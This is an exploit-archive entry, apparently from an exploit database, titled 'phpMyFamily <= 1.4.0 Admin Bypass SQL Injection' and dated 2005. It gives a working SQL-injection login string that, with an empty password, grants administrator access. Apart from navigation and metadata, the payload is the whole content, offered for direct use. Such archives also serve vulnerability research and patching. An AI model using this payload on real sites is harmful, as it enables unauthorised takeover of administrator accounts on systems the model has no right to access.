[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : phpMyFamily <= 1.4.0 Admin Bypass SQL Injection
# Published : 2005-03-21
# Author : kre0n
# Previous Title : phpBB <= 2.0.12 Change User Rights Authentication Bypass
# Next Title : ZPanel <= 2.5 Remote SQL Injection Exploit


# Tested with version 1.2.5 /str0ke

Login as admin without pass:

Login: "' OR 'a'='a' AND admin='Y'/*" (without quotes)
Password: (empty)

# www.Syue.com [2005-03-21]